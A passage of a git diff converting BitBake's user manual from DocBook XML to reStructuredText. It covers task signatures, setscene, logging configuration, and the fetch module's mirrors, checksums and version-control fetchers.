- PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
- </literallayout>
- This example ensures that the <filename>PACKAGE_ARCHS</filename> variable does not
- depend on the value of <filename>MACHINE</filename>, even if it does reference it.
- </para>
-
- <para>
- Equally, there are cases where we need to add dependencies BitBake
- is not able to find.
- You can accomplish this by using a line like the following:
- <literallayout class='monospaced'>
- PACKAGE_ARCHS[vardeps] = "MACHINE"
- </literallayout>
- This example explicitly adds the <filename>MACHINE</filename> variable as a
- dependency for <filename>PACKAGE_ARCHS</filename>.
- </para>
-
- <para>
- Consider a case with in-line Python, for example, where BitBake is not
- able to figure out dependencies.
- When running in debug mode (i.e. using <filename>-DDD</filename>), BitBake
- produces output when it discovers something for which it cannot figure out
- dependencies.
- </para>
-
- <para>
- Thus far, this section has limited discussion to the direct inputs into a task.
- Information based on direct inputs is referred to as the "basehash" in the
- code.
- However, there is still the question of a task's indirect inputs - the
- things that were already built and present in the build directory.
- The checksum (or signature) for a particular task needs to add the hashes
- of all the tasks on which the particular task depends.
- Choosing which dependencies to add is a policy decision.
- However, the effect is to generate a master checksum that combines the basehash
- and the hashes of the task's dependencies.
- </para>
-
- <para>
- At the code level, there are a variety of ways both the basehash and the
- dependent task hashes can be influenced.
- Within the BitBake configuration file, we can give BitBake some extra information
- to help it construct the basehash.
- The following statement effectively results in a list of global variable
- dependency excludes - variables never included in any checksum.
- This example uses variables from OpenEmbedded to help illustrate
- the concept:
- <literallayout class='monospaced'>
- BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \
- SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
- USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
- PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
- CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
- </literallayout>
- The previous example excludes the work directory, which is part of
- <filename>TMPDIR</filename>.
- </para>
-
- <para>
- The rules for deciding which hashes of dependent tasks to include through
- dependency chains are more complex and are generally accomplished with a
- Python function.
- The code in <filename>meta/lib/oe/sstatesig.py</filename> shows two examples
- of this and also illustrates how you can insert your own policy into the system
- if so desired.
- This file defines the two basic signature generators OpenEmbedded-Core
- uses: "OEBasic" and "OEBasicHash".
- By default, there is a dummy "noop" signature handler enabled in BitBake.
- This means that behavior is unchanged from previous versions.
- <filename>OE-Core</filename> uses the "OEBasicHash" signature handler by default
- through this setting in the <filename>bitbake.conf</filename> file:
- <literallayout class='monospaced'>
- BB_SIGNATURE_HANDLER ?= "OEBasicHash"
- </literallayout>
- The "OEBasicHash" <filename>BB_SIGNATURE_HANDLER</filename> is the same as the
- "OEBasic" version but adds the task hash to the stamp files.
- This results in any metadata change that changes the task hash, automatically
- causing the task to be run again.
- This removes the need to bump
- <link linkend='var-bb-PR'><filename>PR</filename></link>
- values, and changes to metadata automatically ripple across the build.
- </para>
-
- <para>
- It is also worth noting that the end result of these signature generators is to
- make some dependency and hash information available to the build.
- This information includes:
- <itemizedlist>
- <listitem><para><filename>BB_BASEHASH_task-</filename><replaceable>taskname</replaceable>:
- The base hashes for each task in the recipe.
- </para></listitem>
- <listitem><para><filename>BB_BASEHASH_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
- The base hashes for each dependent task.
- </para></listitem>
- <listitem><para><filename>BBHASHDEPS_</filename><replaceable>filename</replaceable><filename>:</filename><replaceable>taskname</replaceable>:
- The task dependencies for each task.
- </para></listitem>
- <listitem><para><filename>BB_TASKHASH</filename>:
- The hash of the currently running task.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- It is worth noting that BitBake's "-S" option lets you
- debug BitBake's processing of signatures.
- The options passed to -S allow different debugging modes
- to be used, either using BitBake's own debug functions
- or possibly those defined in the metadata/signature handler
- itself.
- The simplest parameter to pass is "none", which causes a
- set of signature information to be written out into
- <filename>STAMPS_DIR</filename>
- corresponding to the targets specified.
- The other currently available parameter is "printdiff",
- which causes BitBake to try to establish the closest
- signature match it can (e.g. in the sstate cache) and then
- run <filename>bitbake-diffsigs</filename> over the matches
- to determine the stamps and delta where these two
- stamp trees diverge.
- <note>
- It is likely that future versions of BitBake will
- provide other signature handlers triggered through
- additional "-S" parameters.
- </note>
- </para>
-
- <para>
- You can find more information on checksum metadata in the
- "<link linkend='task-checksums-and-setscene'>Task Checksums and Setscene</link>"
- section.
- </para>
- </section>
-
- <section id='setscene'>
- <title>Setscene</title>
-
- <para>
- The setscene process enables BitBake to handle "pre-built" artifacts.
- The ability to handle and reuse these artifacts allows BitBake
- the luxury of not having to build something from scratch every time.
- Instead, BitBake can use, when possible, existing build artifacts.
- </para>
-
- <para>
- BitBake needs to have reliable data indicating whether or not an
- artifact is compatible.
- Signatures, described in the previous section, provide an ideal
- way of representing whether an artifact is compatible.
- If a signature is the same, an object can be reused.
- </para>
-
- <para>
- If an object can be reused, the problem then becomes how to
- replace a given task or set of tasks with the pre-built artifact.
- BitBake solves the problem with the "setscene" process.
- </para>
-
- <para>
- When BitBake is asked to build a given target, before building anything,
- it first asks whether cached information is available for any of the
- targets it's building, or any of the intermediate targets.
- If cached information is available, BitBake uses this information instead of
- running the main tasks.
- </para>
-
- <para>
- BitBake first calls the function defined by the
- <link linkend='var-bb-BB_HASHCHECK_FUNCTION'><filename>BB_HASHCHECK_FUNCTION</filename></link>
- variable with a list of tasks and corresponding
- hashes it wants to build.
- This function is designed to be fast and returns a list
- of the tasks for which it believes in can obtain artifacts.
- </para>
-
- <para>
- Next, for each of the tasks that were returned as possibilities,
- BitBake executes a setscene version of the task that the possible
- artifact covers.
- Setscene versions of a task have the string "_setscene" appended to the
- task name.
- So, for example, the task with the name <filename>xxx</filename> has
- a setscene task named <filename>xxx_setscene</filename>.
- The setscene version of the task executes and provides the necessary
- artifacts returning either success or failure.
- </para>
-
- <para>
- As previously mentioned, an artifact can cover more than one task.
- For example, it is pointless to obtain a compiler if you
- already have the compiled binary.
- To handle this, BitBake calls the
- <link linkend='var-bb-BB_SETSCENE_DEPVALID'><filename>BB_SETSCENE_DEPVALID</filename></link>
- function for each successful setscene task to know whether or not it needs
- to obtain the dependencies of that task.
- </para>
-
- <para>
- Finally, after all the setscene tasks have executed, BitBake calls the
- function listed in
- <link linkend='var-bb-BB_SETSCENE_VERIFY_FUNCTION2'><filename>BB_SETSCENE_VERIFY_FUNCTION2</filename></link>
- with the list of tasks BitBake thinks has been "covered".
- The metadata can then ensure that this list is correct and can
- inform BitBake that it wants specific tasks to be run regardless
- of the setscene result.
- </para>
-
- <para>
- You can find more information on setscene metadata in the
- "<link linkend='task-checksums-and-setscene'>Task Checksums and Setscene</link>"
- section.
- </para>
- </section>
-
- <section id="logging">
- <title>Logging</title>
- <para>
- In addition to the standard command line option to control how
- verbose builds are when execute, bitbake also supports user defined
- configuration of the
- <ulink url='https://docs.python.org/3/library/logging.html'>Python logging</ulink>
- facilities through the
- <link linkend="var-bb-BB_LOGCONFIG"><filename>BB_LOGCONFIG</filename></link>
- variable. This variable defines a json or yaml
- <ulink url='https://docs.python.org/3/library/logging.config.html'>logging configuration</ulink>
- that will be intelligently merged into the default configuration.
- The logging configuration is merged using the following rules:
- <itemizedlist>
- <listitem><para>
- The user defined configuration will completely replace the default
- configuration if top level key
- <filename>bitbake_merge</filename> is set to the value
- <filename>False</filename>. In this case, all other rules
- are ignored.
- </para></listitem>
- <listitem><para>
- The user configuration must have a top level
- <filename>version</filename> which must match the value of
- the default configuration.
- </para></listitem>
- <listitem><para>
- Any keys defined in the <filename>handlers</filename>,
- <filename>formatters</filename>, or <filename>filters</filename>,
- will be merged into the same section in the default
- configuration, with the user specified keys taking
- replacing a default one if there is a conflict. In
- practice, this means that if both the default configuration
- and user configuration specify a handler named
- <filename>myhandler</filename>, the user defined one will
- replace the default. To prevent the user from inadvertently
- replacing a default handler, formatter, or filter, all of
- the default ones are named with a prefix of
- "<filename>BitBake.</filename>"
- </para></listitem>
- <listitem><para>
- If a logger is defined by the user with the key
- <filename>bitbake_merge</filename> set to
- <filename>False</filename>, that logger will be completely
- replaced by user configuration. In this case, no other
- rules will apply to that logger.
- </para></listitem>
- <listitem><para>
- All user defined <filename>filter</filename> and
- <filename>handlers</filename> properties for a given logger
- will be merged with corresponding properties from the
- default logger. For example, if the user configuration adds
- a filter called <filename>myFilter</filename> to the
- <filename>BitBake.SigGen</filename>, and the default
- configuration adds a filter called
- <filename>BitBake.defaultFilter</filename>, both filters
- will be applied to the logger
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- As an example, consider the following user logging configuration
- file which logs all Hash Equivalence related messages of VERBOSE or
- higher to a file called <filename>hashequiv.log</filename>
- <literallayout class='monospaced'>
- {
- "version": 1,
- "handlers": {
- "autobuilderlog": {
- "class": "logging.FileHandler",
- "formatter": "logfileFormatter",
- "level": "DEBUG",
- "filename": "hashequiv.log",
- "mode": "w"
- }
- },
- "formatters": {
- "logfileFormatter": {
- "format": "%(name)s: %(levelname)s: %(message)s"
- }
- },
- "loggers": {
- "BitBake.SigGen.HashEquiv": {
- "level": "VERBOSE",
- "handlers": ["autobuilderlog"]
- },
- "BitBake.RunQueue.HashEquiv": {
- "level": "VERBOSE",
- "handlers": ["autobuilderlog"]
- }
- }
- }
- </literallayout>
- </para>
- </section>
-</chapter>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
new file mode 100644
index 0000000000..75e8dd69d9
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.rst
@@ -0,0 +1,621 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+=====================
+File Download Support
+=====================
+
+|
+
+BitBake's fetch module is a standalone piece of library code that deals
+with the intricacies of downloading source code and files from remote
+systems. Fetching source code is one of the cornerstones of building
+software. As such, this module forms an important part of BitBake.
+
+The current fetch module is called "fetch2" and refers to the fact that
+it is the second major version of the API. The original version is
+obsolete and has been removed from the codebase. Thus, in all cases,
+"fetch" refers to "fetch2" in this manual.
+
+The Download (Fetch)
+====================
+
+BitBake takes several steps when fetching source code or files. The
+fetcher codebase deals with two distinct processes in order: obtaining
+the files from somewhere (cached or otherwise) and then unpacking those
+files into a specific location and perhaps in a specific way. Getting
+and unpacking the files is often optionally followed by patching.
+Patching, however, is not covered by this module.
+
+The code to execute the first part of this process, a fetch, looks
+something like the following: ::
+
+ src_uri = (d.getVar('SRC_URI') or "").split()
+ fetcher = bb.fetch2.Fetch(src_uri, d)
+ fetcher.download()
+
+This code sets up an instance of the fetch class. The instance uses a
+space-separated list of URLs from the :term:`SRC_URI`
+variable and then calls the ``download`` method to download the files.
+
+The instantiation of the fetch class is usually followed by: ::
+
+ rootdir = l.getVar('WORKDIR')
+ fetcher.unpack(rootdir)
+
+This code unpacks the downloaded files to the specified by ``WORKDIR``.
+
+.. note::
+
+ For convenience, the naming in these examples matches the variables
+ used by OpenEmbedded. If you want to see the above code in action,
+ examine the OpenEmbedded class file ``base.bbclass``
+ .
+
+The ``SRC_URI`` and ``WORKDIR`` variables are not hardcoded into the
+fetcher, since those fetcher methods can be (and are) called with
+different variable names. In OpenEmbedded for example, the shared state
+(sstate) code uses the fetch module to fetch the sstate files.
+
+When the ``download()`` method is called, BitBake tries to resolve the
+URLs by looking for source files in a specific search order:
+
+- *Pre-mirror Sites:* BitBake first uses pre-mirrors to try and find
+ source files. These locations are defined using the
+ :term:`PREMIRRORS` variable.
+
+- *Source URI:* If pre-mirrors fail, BitBake uses the original URL (e.g
+ from ``SRC_URI``).
+
+- *Mirror Sites:* If fetch failures occur, BitBake next uses mirror
+ locations as defined by the :term:`MIRRORS` variable.
+
+For each URL passed to the fetcher, the fetcher calls the submodule that
+handles that particular URL type. This behavior can be the source of
+some confusion when you are providing URLs for the ``SRC_URI`` variable.
+Consider the following two URLs: ::
+
+ http://git.yoctoproject.org/git/poky;protocol=git
+ git://git.yoctoproject.org/git/poky;protocol=http
+
+In the former case, the URL is passed to the ``wget`` fetcher, which does not
+understand "git". Therefore, the latter case is the correct form since the Git
+fetcher does know how to use HTTP as a transport.
+
+Here are some examples that show commonly used mirror definitions: ::
+
+ PREMIRRORS ?= "\
+ bzr://.*/.\* http://somemirror.org/sources/ \\n \
+ cvs://.*/.\* http://somemirror.org/sources/ \\n \
+ git://.*/.\* http://somemirror.org/sources/ \\n \
+ hg://.*/.\* http://somemirror.org/sources/ \\n \
+ osc://.*/.\* http://somemirror.org/sources/ \\n \
+ p4://.*/.\* http://somemirror.org/sources/ \\n \
+ svn://.*/.\* http://somemirror.org/sources/ \\n"
+
+ MIRRORS =+ "\
+ ftp://.*/.\* http://somemirror.org/sources/ \\n \
+ http://.*/.\* http://somemirror.org/sources/ \\n \
+ https://.*/.\* http://somemirror.org/sources/ \\n"
+
+It is useful to note that BitBake
+supports cross-URLs. It is possible to mirror a Git repository on an
+HTTP server as a tarball. This is what the ``git://`` mapping in the
+previous example does.
+
+Since network accesses are slow, BitBake maintains a cache of files
+downloaded from the network. Any source files that are not local (i.e.
+downloaded from the Internet) are placed into the download directory,
+which is specified by the :term:`DL_DIR` variable.
+
+File integrity is of key importance for reproducing builds. For
+non-local archive downloads, the fetcher code can verify SHA-256 and MD5
+checksums to ensure the archives have been downloaded correctly. You can
+specify these checksums by using the ``SRC_URI`` variable with the
+appropriate varflags as follows: ::
+
+ SRC_URI[md5sum] = "value"
+ SRC_URI[sha256sum] = "value"
+
+You can also specify the checksums as
+parameters on the ``SRC_URI`` as shown below: ::
+
+ SRC_URI = "http://example.com/foobar.tar.bz2;md5sum=4a8e0f237e961fd7785d19d07fdb994d"
+
+If multiple URIs exist, you can specify the checksums either directly as
+in the previous example, or you can name the URLs. The following syntax
+shows how you name the URIs: ::
+
+ SRC_URI = "http://example.com/foobar.tar.bz2;name=foo"
+ SRC_URI[foo.md5sum] = 4a8e0f237e961fd7785d19d07fdb994d
+
+After a file has been downloaded and
+has had its checksum checked, a ".done" stamp is placed in ``DL_DIR``.
+BitBake uses this stamp during subsequent builds to avoid downloading or
+comparing a checksum for the file again.
+
+.. note::
+
+ It is assumed that local storage is safe from data corruption. If
+ this were not the case, there would be bigger issues to worry about.
+
+If :term:`BB_STRICT_CHECKSUM` is set, any
+download without a checksum triggers an error message. The
+:term:`BB_NO_NETWORK` variable can be used to
+make any attempted network access a fatal error, which is useful for
+checking that mirrors are complete as well as other things.
+
+.. _bb-the-unpack:
+
+The Unpack
+==========
+
+The unpack process usually immediately follows the download. For all
+URLs except Git URLs, BitBake uses the common ``unpack`` method.
+
+A number of parameters exist that you can specify within the URL to
+govern the behavior of the unpack stage:
+
+- *unpack:* Controls whether the URL components are unpacked. If set to
+ "1", which is the default, the components are unpacked. If set to
+ "0", the unpack stage leaves the file alone. This parameter is useful
+ when you want an archive to be copied in and not be unpacked.
+
+- *dos:* Applies to ``.zip`` and ``.jar`` files and specifies whether
+ to use DOS line ending conversion on text files.
+
+- *basepath:* Instructs the unpack stage to strip the specified
+ directories from the source path when unpacking.
+
+- *subdir:* Unpacks the specific URL to the specified subdirectory
+ within the root directory.
+
+The unpack call automatically decompresses and extracts files with ".Z",
+".z", ".gz", ".xz", ".zip", ".jar", ".ipk", ".rpm". ".srpm", ".deb" and
+".bz2" extensions as well as various combinations of tarball extensions.
+
+As mentioned, the Git fetcher has its own unpack method that is
+optimized to work with Git trees. Basically, this method works by
+cloning the tree into the final directory. The process is completed
+using references so that there is only one central copy of the Git
+metadata needed.
+
+.. _bb-fetchers:
+
+Fetchers
+========
+
+As mentioned earlier, the URL prefix determines which fetcher submodule
+BitBake uses. Each submodule can support different URL parameters, which
+are described in the following sections.
+
+.. _local-file-fetcher:
+
+Local file fetcher (``file://``)
+--------------------------------
+
+This submodule handles URLs that begin with ``file://``. The filename
+you specify within the URL can be either an absolute or relative path to
+a file. If the filename is relative, the contents of the
+:term:`FILESPATH` variable is used in the same way
+``PATH`` is used to find executables. If the file cannot be found, it is
+assumed that it is available in :term:`DL_DIR` by the
+time the ``download()`` method is called.
+
+If you specify a directory, the entire directory is unpacked.
+
+Here are a couple of example URLs, the first relative and the second
+absolute: ::
+
+ SRC_URI = "file://relativefile.patch"
+ SRC_URI = "file:///Users/ich/very_important_software"
+
+.. _http-ftp-fetcher:
+
+HTTP/FTP wget fetcher (``http://``, ``ftp://``, ``https://``)
+-------------------------------------------------------------
+
+This fetcher obtains files from web and FTP servers. Internally, the
+fetcher uses the wget utility.
+
+The executable and parameters used are specified by the
+``FETCHCMD_wget`` variable, which defaults to sensible values. The
+fetcher supports a parameter "downloadfilename" that allows the name of
+the downloaded file to be specified. Specifying the name of the
+downloaded file is useful for avoiding collisions in
+:term:`DL_DIR` when dealing with multiple files that
+have the same name.
+
+Some example URLs are as follows: ::
+
+ SRC_URI = "http://oe.handhelds.org/not_there.aac"
+ SRC_URI = "ftp://oe.handhelds.org/not_there_as_well.aac"
+ SRC_URI = "ftp://you@oe.handhelds.org/home/you/secret.plan"
+
+.. note::
+
+ Because URL parameters are delimited by semi-colons, this can
+ introduce ambiguity when parsing URLs that also contain semi-colons,
+ for example:
+ ::
+
+ SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git;a=snapshot;h=a5dd47"
+
+
+ Such URLs should should be modified by replacing semi-colons with '&'
+ characters:
+ ::
+
+ SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&a=snapshot&h=a5dd47"
+
+
+ In most cases this should work. Treating semi-colons and '&' in
+ queries identically is recommended by the World Wide Web Consortium
+ (W3C). Note that due to the nature of the URL, you may have to
+ specify the name of the downloaded file as well:
+ ::
+
+ SRC_URI = "http://abc123.org/git/?p=gcc/gcc.git&a=snapshot&h=a5dd47;downloadfilename=myfile.bz2"
+
+
+.. _cvs-fetcher:
+
+CVS fetcher (``(cvs://``)
+-------------------------
+
+This submodule handles checking out files from the CVS version control
+system. You can configure it using a number of different variables:
+
+- :term:`FETCHCMD_cvs <FETCHCMD>`: The name of the executable to use when running
+ the ``cvs`` command. This name is usually "cvs".
+
+- :term:`SRCDATE`: The date to use when fetching the CVS source code. A
+ special value of "now" causes the checkout to be updated on every
+ build.
+
+- :term:`CVSDIR`: Specifies where a temporary
+ checkout is saved. The location is often ``DL_DIR/cvs``.
+
+- CVS_PROXY_HOST: The name to use as a "proxy=" parameter to the
+ ``cvs`` command.
+
+- CVS_PROXY_PORT: The port number to use as a "proxyport="
+ parameter to the ``cvs`` command.
+
+As well as the standard username and password URL syntax, you can also
+configure the fetcher with various URL parameters:
+
+The supported parameters are as follows:
+
+- *"method":* The protocol over which to communicate with the CVS
+ server. By default, this protocol is "pserver". If "method" is set to
+ "ext", BitBake examines the "rsh" parameter and sets ``CVS_RSH``. You
+ can use "dir" for local directories.
+
+- *"module":* Specifies the module to check out. You must supply this
+ parameter.
+
+- *"tag":* Describes which CVS TAG should be used for the checkout. By
+ default, the TAG is empty.
+
+- *"date":* Specifies a date. If no "date" is specified, the
+ :term:`SRCDATE` of the configuration is used to
+ checkout a specific date. The special value of "now" causes the
+ checkout to be updated on every build.
+
+- *"localdir":* Used to rename the module. Effectively, you are
+ renaming the output directory to which the module is unpacked. You
+ are forcing the module into a special directory relative to
+ :term:`CVSDIR`.
+
+- *"rsh":* Used in conjunction with the "method" parameter.
+
+- *"scmdata":* Causes the CVS metadata to be maintained in the tarball
+ the fetcher creates when set to "keep". The tarball is expanded into
+ the work directory. By default, the CVS metadata is removed.
+
+- *"fullpath":* Controls whether the resulting checkout is at the
+ module level, which is the default, or is at deeper paths.
+
+- *"norecurse":* Causes the fetcher to only checkout the specified
+ directory with no recurse into any subdirectories.
+
+- *"port":* The port to which the CVS server connects.
+
+Some example URLs are as follows: ::
+
+ SRC_URI = "cvs://CVSROOT;module=mymodule;tag=some-version;method=ext"
+ SRC_URI = "cvs://CVSROOT;module=mymodule;date=20060126;localdir=usethat"
+
+.. _svn-fetcher:
+
+Subversion (SVN) Fetcher (``svn://``)
+-------------------------------------
+
+This fetcher submodule fetches code from the Subversion source control
+system. The executable used is specified by ``FETCHCMD_svn``, which
+defaults to "svn". The fetcher's temporary working directory is set by
+:term:`SVNDIR`, which is usually ``DL_DIR/svn``.
+
+The supported parameters are as follows:
+
+- *"module":* The name of the svn module to checkout. You must provide
+ this parameter. You can think of this parameter as the top-level
+ directory of the repository data you want.
+
+- *"path_spec":* A specific directory in which to checkout the
+ specified svn module.
+
+- *"protocol":* The protocol to use, which defaults to "svn". If
+ "protocol" is set to "svn+ssh", the "ssh" parameter is also used.
+
+- *"rev":* The revision of the source code to checkout.
+
+- *"scmdata":* Causes the ".svn" directories to be available during
+ compile-time when set to "keep". By default, these directories are
+ removed.
+
+- *"ssh":* An optional parameter used when "protocol" is set to
+ "svn+ssh". You can use this parameter to specify the ssh program used
+ by svn.
+
+- *"transportuser":* When required, sets the username for the
+ transport. By default, this parameter is empty. The transport
+ username is different than the username used in the main URL, which
+ is passed to the subversion command.
+
+Following are three examples using svn: ::
+
+ SRC_URI = "svn://myrepos/proj1;module=vip;protocol=http;rev=667"
+ SRC_URI = "svn://myrepos/proj1;module=opie;protocol=svn+ssh"
+ SRC_URI = "svn://myrepos/proj1;module=trunk;protocol=http;path_spec=${MY_DIR}/proj1"
+
+.. _git-fetcher:
+
+Git Fetcher (``git://``)
+------------------------
+
+This fetcher submodule fetches code from the Git source control system.
+The fetcher works by creating a bare clone of the remote into
+:term:`GITDIR`, which is usually ``DL_DIR/git2``. This
+bare clone is then cloned into the work directory during the unpack
+stage when a specific tree is checked out. This is done using alternates
+and by reference to minimize the amount of duplicate data on the disk
+and make the unpack process fast. The executable used can be set with
+``FETCHCMD_git``.
+
+This fetcher supports the following parameters:
+
+- *"protocol":* The protocol used to fetch the files. The default is
+ "git" when a hostname is set. If a hostname is not set, the Git
+ protocol is "file". You can also use "http", "https", "ssh" and
+ "rsync".
+
+- *"nocheckout":* Tells the fetcher to not checkout source code when
+ unpacking when set to "1". Set this option for the URL where there is
+ a custom routine to checkout code. The default is "0".
+
+- *"rebaseable":* Indicates that the upstream Git repository can be
+ rebased. You should set this parameter to "1" if revisions can become
+ detached from branches. In this case, the source mirror tarball is
+ done per revision, which has a loss of efficiency. Rebasing the
+ upstream Git repository could cause the current revision to disappear
+ from the upstream repository. This option reminds the fetcher to
+ preserve the local cache carefully for future use. The default value
+ for this parameter is "0".
+
+- *"nobranch":* Tells the fetcher to not check the SHA validation for
+ the branch when set to "1". The default is "0". Set this option for
+ the recipe that refers to the commit that is valid for any namespace
+ (branch, tag, ...) instead of the branch.
+
+- *"bareclone":* Tells the fetcher to clone a bare clone into the
+ destination directory without checking out a working tree. Only the
+ raw Git metadata is provided. This parameter implies the "nocheckout"
+ parameter as well.
+
+- *"branch":* The branch(es) of the Git tree to clone. If unset, this
+ is assumed to be "master". The number of branch parameters much match
+ the number of name parameters.
+
+- *"rev":* The revision to use for the checkout. The default is
+ "master".
+
+- *"tag":* Specifies a tag to use for the checkout. To correctly
+ resolve tags, BitBake must access the network. For that reason, tags
+ are often not used. As far as Git is concerned, the "tag" parameter
+ behaves effectively the same as the "rev" parameter.
+
+- *"subpath":* Limits the checkout to a specific subpath of the tree.
+ By default, the whole tree is checked out.
+
+- *"destsuffix":* The name of the path in which to place the checkout.
+ By default, the path is ``git/``.
+
+- *"usehead":* Enables local ``git://`` URLs to use the current branch
+ HEAD as the revision for use with ``AUTOREV``. The "usehead"
+ parameter implies no branch and only works when the transfer protocol
+ is ``file://``.
+
+Here are some example URLs: ::
+
+ SRC_URI = "git://git.oe.handhelds.org/git/vip.git;tag=version-1"
+ SRC_URI = "git://git.oe.handhelds.org/git/vip.git;protocol=http"
+
+.. _gitsm-fetcher:
+
+Git Submodule Fetcher (``gitsm://``)
+------------------------------------
+
+This fetcher submodule inherits from the :ref:`Git
+fetcher<bitbake-user-manual/bitbake-user-manual-fetching:git fetcher
+(\`\`git://\`\`)>` and extends that fetcher's behavior by fetching a
+repository's submodules. :term:`SRC_URI` is passed to the Git fetcher as
+described in the :ref:`bitbake-user-manual/bitbake-user-manual-fetching:git
+fetcher (\`\`git://\`\`)` section.
+
+.. note::
+
+ You must clean a recipe when switching between '``git://``' and
+ '``gitsm://``' URLs.
+
+ The Git Submodules fetcher is not a complete fetcher implementation.
+ The fetcher has known issues where it does not use the normal source
+ mirroring infrastructure properly. Further, the submodule sources it
+ fetches are not visible to the licensing and source archiving
+ infrastructures.
+
+.. _clearcase-fetcher:
+
+ClearCase Fetcher (``ccrc://``)
+-------------------------------
+
+This fetcher submodule fetches code from a
+`ClearCase <http://en.wikipedia.org/wiki/Rational_ClearCase>`__
+repository.
+
+To use this fetcher, make sure your recipe has proper
+:term:`SRC_URI`, :term:`SRCREV`, and
+:term:`PV` settings. Here is an example: ::
+
+ SRC_URI = "ccrc://cc.example.org/ccrc;vob=/example_vob;module=/example_module"
+ SRCREV = "EXAMPLE_CLEARCASE_TAG"
+ PV = "${@d.getVar("SRCREV", False).replace("/", "+")}"
+
+The fetcher uses the ``rcleartool`` or
+``cleartool`` remote client, depending on which one is available.
+
+Following are options for the ``SRC_URI`` statement:
+
+- *vob*: The name, which must include the prepending "/" character,
+ of the ClearCase VOB. This option is required.
+
+- *module*: The module, which must include the prepending "/"
+ character, in the selected VOB.
+
+ .. note::
+
+ The module and vob options are combined to create the load rule in the
+ view config spec. As an example, consider the vob and module values from
+ the SRC_URI statement at the start of this section. Combining those values
+ results in the following: ::
+
+ load /example_vob/example_module
+
+- *proto*: The protocol, which can be either ``http`` or ``https``.
+
+By default, the fetcher creates a configuration specification. If you
+want this specification written to an area other than the default, use
+the ``CCASE_CUSTOM_CONFIG_SPEC`` variable in your recipe to define where
+the specification is written.
+
+.. note::
+
+ the SRCREV loses its functionality if you specify this variable. However,
+ SRCREV is still used to label the archive after a fetch even though it does
+ not define what is fetched.
+
+Here are a couple of other behaviors worth mentioning:
+
+- When using ``cleartool``, the login of ``cleartool`` is handled by
+ the system. The login require no special steps.
+
+- In order to use ``rcleartool`` with authenticated users, an
+ "rcleartool login" is necessary before using the fetcher.
+
+.. _perforce-fetcher:
+
+Perforce Fetcher (``p4://``)
+----------------------------
+
+This fetcher submodule fetches code from the
+`Perforce <https://www.perforce.com/>`__ source control system. The
+executable used is specified by ``FETCHCMD_p4``, which defaults to "p4".
+The fetcher's temporary working directory is set by
+:term:`P4DIR`, which defaults to "DL_DIR/p4".
+The fetcher does not make use of a perforce client, instead it
+relies on ``p4 files`` to retrieve a list of
+files and ``p4 print`` to transfer the content
+of those files locally.
+
+To use this fetcher, make sure your recipe has proper
+:term:`SRC_URI`, :term:`SRCREV`, and
+:term:`PV` values. The p4 executable is able to use the
+config file defined by your system's ``P4CONFIG`` environment variable
+in order to define the Perforce server URL and port, username, and
+password if you do not wish to keep those values in a recipe itself. If
+you choose not to use ``P4CONFIG``, or to explicitly set variables that
+``P4CONFIG`` can contain, you can specify the ``P4PORT`` value, which is
+the server's URL and port number, and you can specify a username and
+password directly in your recipe within ``SRC_URI``.
+
+Here is an example that relies on ``P4CONFIG`` to specify the server URL
+and port, username, and password, and fetches the Head Revision: ::
+
+ SRC_URI = "p4://example-depot/main/source/..."
+ SRCREV = "${AUTOREV}"
+ PV = "p4-${SRCPV}"
+ S = "${WORKDIR}/p4"
+
+Here is an example that specifies the server URL and port, username, and
+password, and fetches a Revision based on a Label: ::
+
+ P4PORT = "tcp:p4server.example.net:1666"
+ SRC_URI = "p4://user:passwd@example-depot/main/source/..."
+ SRCREV = "release-1.0"
+ PV = "p4-${SRCPV}"
+ S = "${WORKDIR}/p4"
+
+.. note::
+
+ You should always set S to "${WORKDIR}/p4" in your recipe.
+
+.. _repo-fetcher:
+
+Repo Fetcher (``repo://``)
+--------------------------
+
+This fetcher submodule fetches code from ``google-repo`` source control
+system. The fetcher works by initiating and syncing sources of the
+repository into :term:`REPODIR`, which is usually
+``${DL_DIR}/repo``.
+
+This fetcher supports the following parameters:
+
+- *"protocol":* Protocol to fetch the repository manifest (default:
+ git).
+
+- *"branch":* Branch or tag of repository to get (default: master).
+
+- *"manifest":* Name of the manifest file (default: ``default.xml``).
+
+Here are some example URLs: ::
+
+ SRC_URI = "repo://REPOROOT;protocol=git;branch=some_branch;manifest=my_manifest.xml"
+ SRC_URI = "repo://REPOROOT;protocol=file;branch=some_branch;manifest=my_manifest.xml"
+
+Other Fetchers
+--------------
+
+Fetch submodules also exist for the following:
+
+- Bazaar (``bzr://``)
+
+- Mercurial (``hg://``)
+
+- npm (``npm://``)
+
+- OSC (``osc://``)
+
+- Secure FTP (``sftp://``)
+
+- Secure Shell (``ssh://``)
+
+- Trees using Git Annex (``gitannex://``)
+
+No documentation currently exists for these lesser used fetcher
+submodules. However, you might find the code helpful and readable.
+
+Auto Revisions
+==============
+
+We need to document ``AUTOREV`` and ``SRCREV_FORMAT`` here.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml
deleted file mode 100644
index d1bfc23362..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-fetching.xml
+++ /dev/null
@@ -1,868 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter>
-<title>File Download Support</title>
-
- <para>
- BitBake's fetch module is a standalone piece of library code
- that deals with the intricacies of downloading source code
